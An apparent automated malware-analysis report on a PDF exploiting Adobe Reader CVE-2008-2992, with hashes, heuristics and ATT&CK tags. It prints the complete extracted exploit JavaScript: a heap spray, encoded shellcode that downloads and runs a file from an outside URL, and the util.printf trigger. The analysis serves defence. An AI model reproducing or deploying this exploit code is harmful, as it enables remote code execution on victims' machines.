CVE-2008-2992 — PDF malware analysis

Static analysis result for SHA-256 0bee392eddf81f09…

MALICIOUS

PDF

1.7 KB First seen: 2026-05-07
MD5: 077b691426a322c020c7cd487fa350ab SHA-1: 3bec057446384189b5563693ca9f92e6715eaf4e SHA-256: 0bee392eddf81f0947eec0560440976e439e2dbf8aae2041344832c46cede471
106 Risk Score

Malware Insights

CVE-2008-2992 · confidence 95%

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

The PDF file contains embedded JavaScript that utilizes a heap spray technique, identified as a known exploit for Adobe Reader (CVE-2008-2992). This exploit is designed to achieve arbitrary code execution. The ML classifier strongly supports the malicious nature of this file.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9999

Heuristics 3

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Adobe Reader JavaScript heap-spray exploit (known CVE family) critical CVE related PDF_JS_KNOWN_CVE_HEAPSPRAY_FAMILY
    PDF JavaScript combines heap-spray staging (NOP-sled / shellcode nybble sled or a multi-kilobyte setTimeOut/setInterval launcher) with the removed Adobe Reader sink util.printf, associated with CVE-2008-2992. Benign documents never pair heap-spray with these long-removed APIs. The exact malformed argument is assembled at run time, so this attributes the exploit to a known pre-2011 Reader CVE family rather than the exact primitive.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0005_000.js pdf-javascript-stream PDF /JS object 5 at offset 0x10F 2933 bytes
SHA-256: 24453678e814687c165ac4dc7ebb18d55267a1768dc347107db2931a9c19a885
Preview script
First 1,000 lines of the extracted script
var my_kval = 20000 * 3;var my_kval1 = 262144;var my_kval2 = 0x5AA;var next = '\u4b4f\u4027';var Alpha = '';for (Buffer = 128; Buffer >= 0; --Buffer) Alpha += next;var html = '\u00E8\u0000\u5B00\uB38D\u01FB\u0000\u8D56\uE7B3\u0001\u5600\u056A\u8868\u0D4E\uE800\u00EB\u0000\uB38D\u021B\u0000\uFF56\uFB93\u0001\u9000\u9090\u8D50\u26B3\u0002\u5600\uFF50\uFF93\u0001\u8900\u0F83\u0002\u6A00\u6A00\u8D00\u99B3\u0002\u5600\uB38D\u0275\u0000\u68B0\u0688\u74B0\u4688\u9001\u4688\uB002\u8870\u0346\u3AB0\u4688\uB004\u882F\u0546\u4688\u5606\u006A\u93FF\u020F\u0000\u006A\u838D\u0299\u0000\uFF50\u0793\u0002\u9000\u9090\u5890\u006A\u93FF\u020B\u0000\u8D50\u39B3\u0002\u5600\uFF50\uFF93\u0001\u8900\u1383\u0002\u5800\uB38D\u0246\u0000\u5056\u93FF\u01FF\u0000\u8389\u0217\u0000\u286A\u006A\u93FF\u0203\u0000\u8389\u0256\u0000\u93FF\u020F\u0000\u6850\u03E8\u0000\u286A\uB3FF\u0256\u0000\u006A\uB3FF\u025E\u0000\uB38D\u0262\u0000\uFF56\u5AB3\u0002\u5000\u93FF\u0213\u0000\u93FF\u0217\u0000\u55C3\uE589\u5651\u8B57\u0C4D\u758B\u8B10\u147D\u36FF\u75FF\uE808\u0013\u0000\u0789\uC783\u8304\u04C6\uECE2\u5E5F\u8959\u5DEC\u10C2\u5500\uE589\u5653\u5157\uFF64\u3035\u0000\u5800\u408B\u8B0C\u0C48\u118B\u418B\u6A30\u8B02\u087D\u5057\u5BE8\u0000\u8500\u74C0\u8904\uEBD1\u8BE7\u1841\u8B50\u3C58\uD801\u588B\u5878\u0150\u8BC3\u1C4B\u538B\u8B20\u245B\uC101\uC201\uC301\u328B\u5058\uC601\u016A\u75FF\u560C\u23E8\u0000\u8500\u74C0\u8308\u04C2\uC383\uEB02\u58E3\uD231\u8B66\uC113\u02E2\uD101\u0103\u5F59\u5B5E\uEC89\uC25D\u0008\u8955\u51E5\u5253\uC931\uDB31\uD231\u458B\u8A08\u8010\u60CA\uD301\uE3D1\u4503\u8A10\u8408\uE0C9\u31EE\u8BC0\u0C4D\uCB39\u0174\u5A40\u595B\uEC89\uC25D\u000C\u5786\u000D\u8BFA\u0034\u5542\u0003\u6FEA\u0000\uBC6A\u0006\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u7275\u6D6C\u6E6F\u642E\u6C6C\u5500\u4C52\u6F44\u6E77\u6F6C\u6461\u6F54\u6946\u656C\u0041\u6349\u706D\u6553\u646E\u6345\u6F68\u4900\u6D63\u4370\u6F6C\u6573\u6148\u646E\u656C\u0000\u0000\u0A00\u0C0B\u130D\u0000\u5000\u6E69\u2067\u7266\u6D6F\u7320\u6568\u6C6C\u6F63\u6564\u6E6A\u686E\u6734\u7767\u7777\u732E\u6D6C\u6874\u7265\u636F\u2E6B\u726F\u2F67\u6B73\u612F\u2E73\u6E70\u0067\u3A43\u505C\u6F72\u7267\u6D61\u4620\u6C69\u7365\u435C\u6D6F\u6F6D\u206E\u6946\u656C\u5C73\u6441\u626F\u3165\u2E30\u7865\u0065';Charlie = Alpha + html;David = next;Eddie = 10 + 10;Frank = Eddie + Charlie.length;while (David.length < Frank) David += David;Greg = David.substring(0, Frank);Harry = David.substring(0, David.length - Frank);do{Harry += Greg;if((Harry.length + Frank) >= my_kval1) break;}while(1)Ice = new Array();for (Jack = 0; Jack < my_kval2; Jack++) Ice[Jack] = Harry + Charlie;var source = 35;source = source - 35;var Steve = 'f.%';var Paul = Steve.substring(2,3);var Mike = Steve.substring(1,2);var Lisa = Steve.substring(0,1);var PEBKAC = Paul + my_kval.toString() + Mike + my_kval.toString() + Lisa;util.printf(PEBKAC, source);

Open this report in the interactive analyzer, or submit your own file for analysis.